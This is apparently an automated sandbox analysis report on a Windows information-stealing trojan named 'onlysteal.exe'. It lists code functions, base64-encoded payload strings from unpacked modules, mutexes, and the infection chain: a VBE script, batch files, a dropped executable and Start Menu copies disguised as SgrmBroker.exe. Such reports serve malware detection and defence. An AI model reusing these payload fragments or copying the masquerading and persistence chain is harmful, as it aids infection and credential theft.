                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00236FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00236FAA
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023848E0_2_0023848E
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002400B70_2_002400B7
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002440880_2_00244088
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002340FE0_2_002340FE
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002471530_2_00247153
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002551C90_2_002551C9
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002332F70_2_002332F7
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002462CA0_2_002462CA
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002443BF0_2_002443BF
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023C4260_2_0023C426
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023F4610_2_0023F461
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0025D4400_2_0025D440
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002477EF0_2_002477EF
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023286B0_2_0023286B
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0025D8EE0_2_0025D8EE
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023E9B70_2_0023E9B7
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_002619F40_2_002619F4
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00246CDC0_2_00246CDC
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00243E0B0_2_00243E0B
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00254F9A0_2_00254F9A
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023EFE20_2_0023EFE2
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD34891D555_2_00007FFD34891D55
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD34881EC35_2_00007FFD34881EC3
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 5_2_00007FFD348F08E15_2_00007FFD348F08E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD348B1D5511_2_00007FFD348B1D55
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD348A1EC311_2_00007FFD348A1EC3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD349108E111_2_00007FFD349108E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD348A5BF211_2_00007FFD348A5BF2
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD34A80AED11_2_00007FFD34A80AED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 11_2_00007FFD34A8209D11_2_00007FFD34A8209D
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD348D1D5517_2_00007FFD348D1D55
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD348C1EC317_2_00007FFD348C1EC3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD349308E117_2_00007FFD349308E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 17_2_00007FFD348C5BF217_2_00007FFD348C5BF2
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD348A1D5522_2_00007FFD348A1D55
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD34891EC322_2_00007FFD34891EC3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD349008E122_2_00007FFD349008E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD34A70AED22_2_00007FFD34A70AED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 22_2_00007FFD34A7209D22_2_00007FFD34A7209D
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD3490337B27_2_00007FFD3490337B
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34902AF327_2_00007FFD34902AF3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD349029F227_2_00007FFD349029F2
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD349027ED27_2_00007FFD349027ED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34891EC327_2_00007FFD34891EC3
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD348A1D5527_2_00007FFD348A1D55
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD349008E127_2_00007FFD349008E1
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34A70AED27_2_00007FFD34A70AED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD34A7209D27_2_00007FFD34A7209D
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 27_2_00007FFD348A296127_2_00007FFD348A2961
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: String function: 0024EB78 appears 39 times
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: String function: 0024EC50 appears 56 times
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: String function: 0024F5F0 appears 31 times
                                  Source: onlysteal.exe, 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs onlysteal.exe
                                  Source: onlysteal.exe, 00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs onlysteal.exe
                                  Source: onlysteal.exe, 00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs onlysteal.exe
                                  Source: onlysteal.exe, 00000000.00000003.2091936651.0000000002860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs onlysteal.exe
                                  Source: onlysteal.exe, 00000000.00000003.2091936651.0000000002860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs onlysteal.exe
                                  Source: onlysteal.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs onlysteal.exe
                                  Source: onlysteal.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, E32.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock'
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, s67.csBase64 encoded string: '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
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 76n.csBase64 encoded string: '/xvwBzgSWkJJgHxRwwpSH/Ij/adcJB2Y7U4j2KALS+VcmR2PM3EjZaaKUPsruNk/bxXv5umeNrau3QzqFTTxNOzq9qbTO/v4f5W7pha3Vy1gURf7SLXA5r9cpub83QEFwA4gE5upqbkkLWRhO2l/rcW3YHhjwSHzGDbZu3cyF/U='
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, s67.csBase64 encoded string: 'H4sIAAAAAAAEADSbx3KDyhKG3+VuWZDTUoicM4izIuecefqDT9V1VbsseZgZMd1//59k//PP/0RslT7//zIumkHL1M5UhNSePZHldkmVtZwh/6oUNd8yRms+zun8opaD7hguo1U+Jb3/RDfkVFduj+Upsr/fU7ns4rQedGL51ygkVr5O8Tt9zSH6PL+CRH2NNJ4ZDytyN0lwL8iBBsyN9rMwQpaZ2MkZnZABvYGx7hVsDouqRJR0pGoQg/3iQIvPMfuXgS1ejmnmYspmhMkPcjvGYAcZiKa5j4iPvCG2iWhxaPaZhhwDiltgcjf45pp9Z4AQTpIwA9p6YZRYGvJjwAficGzLt3RNea7DRa6mCT2E3h+LrHQ92b7ENrTl/HlKqioaSKLXITlnUs3rSaVn8OFPkFWvefGWRRgUb5xACgSygjyPh7aOYx21jZo379MsoDXaCVCp4EKP4MiHGvepwgyufoVpAs0PKFwUwZEtGxGXTkn1ty9nnqFPNH0LAouRkRDIfFDPa1NBrNAMY7lVTtpXY9BzDlwqMmKKJ/NEx3481/epe7sL/usBASyunQhificCYwH2fqd//cKcP8FMEAc/zyvdbMEgfNMCKkT4BxNaY/5yiY7BPDdtV37AaCfwprvpo+gHXk33fTjycEcBfBVFVXNBqigsmERpGGdpwQ/HAgWdw7cLsjsWlV+e5w5iVLw8SvZ510CKu7MNtNgD48moLM1H4Ln3Ai5oCgGJZ0CJcwvhL7AMfkg/J4QR5IbfCIWB7wFtW0oFBb3gM/keTCjgQAaCSoHgzr4LCY9jk3IAEIUr2TgApLqY2/Mxlp3I881IEws/DBM1UxzMPJqD5IMk+t1BoP4h15LL8kMYCKwOD7EoGA5es7VgOzPGwEKnD/MhR4ClRLLZkV/RlDFAU6SmoThVCCbKGkhooDtwlGESHg4RbWsG0NNDUZE5JDFIWX0RxuO47vNzNCOSDldGETRGD7wLQssFvTeEdHCFSTxi1+pUjFQMTKlqecaED1UXnHo4A41dzOBJOwRSrBpdULPtmRIUKswInfe4wZE2RdAieb7e8TWIhyQugsFCijJMMl713UQHkE/aPKXQhz3UsHieh4ZY6qfCMH3qlGkKTce8+YiGwRE+BEnjtKusxZbR6PeGKBq8KFTZixxE1LECC+cYjh3hu2KIS5Ik2qukHTFBuw+FO0XhNwm2Nkh+kfe15uE7a7rCYA7E4F4jQGyCDtuTKUZGULGB00nx/PFkQzfjY1MhD0DwXZZB1LHH4nxmc0HT8A4K2iHyOUibAbiwINKnQ3FtJOVRewSumYj6UYAsYlS2FDkBOI0doZ+RXijTFAiOozrAD3JF/rJtJP1AaIEWCycTO2IEQeEQGV+52YM+wqGrGD0jqjBxiJI3yKzDTGyiEUNGsQgCpoBGudGLKtho6Y4EKuKgBbQcRw2lQalTV6jCQrkc1YRP1lgidW5P1j359+R9R9/C2tn3ZtibTU8ZDV/y5ozrdEP+4FA7KHc6Tvc8KEQ6Rvc0KEG6RHczKPvaMdEk38OgUKtf45baWbs3/Ub+3kNFpN/HQaBM6XTjrtrlocJ7dxheBFEslLm3JJCbsTx4YEFv8J64v4P+9g5dlL7xA1j6c9gqdIO/Y9THDuCKPYRqWjm6AbuAHlZMSAD5Y9rchMoIqwDKZkjdhHYJMfXBAlcONL1w4parvq+DPLwO7Is6H3SSI6Jc4FIFzgLukSRw0aDb8m2HaXovacjYbxjJgRNBcvS7UA3B+zvozXsWhTG8iPfXX7Bqxu/TDwjb/9H1DGOd36Ab076FlewmvTyvfgFGXrhnVWUHghBSmNNnUWoiYBQyQHS4eaMHTqEk8D4kh8v3r7mYcZT3K9qDEMoFRqRGwQTqoRhsgQbVdNll6gw/TXK08Q5TGM3M7G+gWTRcjykBdTp/oAvRxG4RmJPuR3Y/OuBH2yIPq4qCvNmvGbCX6eMf3+Thv7O3GEd2uOCwIQkkCJnKCiFSGmLzAHOA7BIy4woJoQrMia5c6Inmkiuna4LxsTzk/GCDsUybZqCPeX+Uto8nQm+9hCil5y4OZ6pv1PL3N33HgPkI8/iA1hqBKI8IJkCbj3qzQT98EcKRs1fgPyKJOmPSMgjY25TN2fwgSBxI/4o0W6St9rwIG6ikEVeVlEyMgFhA/56Y77IhYUILTM8LKOu+e+DRu6MJxFIifhXt9Dh7HKXmtBiR/0CBxzK2bXQMh3gfG/95DT3Dv5T5EjZPnxoXU8AVccWgU/JeVj9RNJlfqT5zUcfjQBzjbdoxTe2xJ9HcXfVc8HzNJksVEUW/pkyd6YCFLc+dMtz9QmKzPzUUaihlKGnRVoOq//AVTys4VoRfIsBDAgdoDYzY0PmHcis07F5kZV2zke6SFJH+phS0jX8B+exZa7GWjxzUU/2ef1TXMp/yxBrCNnIFnF6HcW6Dgk24ucrOrjsX8YR5l74ouunadvm4kcs7c2Zexa2GiGvqxkBiGl1D4OgSPj1k5mxdYl4jbSkQVWEdFFZpiAGzvx5ukdUZIKLpTKBFGcw7yaoeJ2KJHZcVveT1X6LcuIoTH54mkS3ipvXhWb5HOeKceCglUliA/zrGbwCF23qet91rzQxzoO8QsYCoe/ye7nkiWe+WUnNojbvFJvAFlECMIkSKokVZVwZ27GyOWKoJRW265kVANG6usAFjxrKPCp6UwSAcdUAE5DicKKP6IHBXW713L5AkHZOJFsp79eBsLKEljDBk/73fW70EsSHR48SOpEaOCUP8SCIa5Frgw9PSvkUPxOflos/UysBU065hcmpQo+/EfqQJxKe8pi95MY4AkJ6PJFRgfp5RuO8jnw7BwdzCirF9C6cdyDfzy/OYoyCo09/xvBYzrxvZkmM0bAiyOxKTfzFvd1V+qt+klR4KQGAMX7dXzS9Gqtr6NSOPPELgc0JjKJ10RqoHjuVXUblYj9LX2VoRFARD8C1wUS3eawqC7ArI7ufaWzQ
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 76n.csBase64 encoded string: '/xvwBzgSWkJJgHxRwwpSH/Ij/adcJB2Y7U4j2KALS+VcmR2PM3EjZaaKUPsruNk/bxXv5umeNrau3QzqFTTxNOzq9qbTO/v4f5W7pha3Vy1gURf7SLXA5r9cpub83QEFwA4gE5upqbkkLWRhO2l/rcW3YHhjwSHzGDbZu3cyF/U='
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, m9F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: classification engineClassification label: mal100.troj.evad.winEXE@45/39@0/1
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_00236C74 GetLastError,FormatMessageW,0_2_00236C74
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0024A6C2
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Program Files (x86)\internet explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exeJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\Desktop\vmGXvtnF.logJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5292:120:WilError_03
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMutant created: NULL
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ebfe70ca8abacc37de1b3f373e3a32ec899572a7484d84d302662c41dc4d8e50
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1112:120:WilError_03
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile created: C:\Users\user\AppData\Local\Temp\gQ3ZGmOMEFJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "
                                  Source: C:\Users\user\Desktop\onlysteal.exeCommand line argument: sfxname0_2_0024DF1E
                                  Source: C:\Users\user\Desktop\onlysteal.exeCommand line argument: sfxstime0_2_0024DF1E
                                  Source: C:\Users\user\Desktop\onlysteal.exeCommand line argument: STARTDLG0_2_0024DF1E
                                  Source: C:\Users\user\Desktop\onlysteal.exeCommand line argument: xz(0_2_0024DF1E
                                  Source: onlysteal.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: onlysteal.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Users\user\Desktop\onlysteal.exeFile read: C:\Windows\win.iniJump to behavior
                                  Source: C:\Users\user\Desktop\onlysteal.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: onlysteal.exeReversingLabs: Detection: 71%
                                  Source: onlysteal.exeVirustotal: Detection: 76%
                                  Source: C:\Users\user\Desktop\onlysteal.exeFile read: C:\Users\user\Desktop\onlysteal.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\onlysteal.exe "C:\Users\user\Desktop\onlysteal.exe"
                                  Source: C:\Users\user\Desktop\onlysteal.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Intorefnet\hyperBlockCrtCommon.exe "C:\Intorefnet/hyperBlockCrtCommon.exe"
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
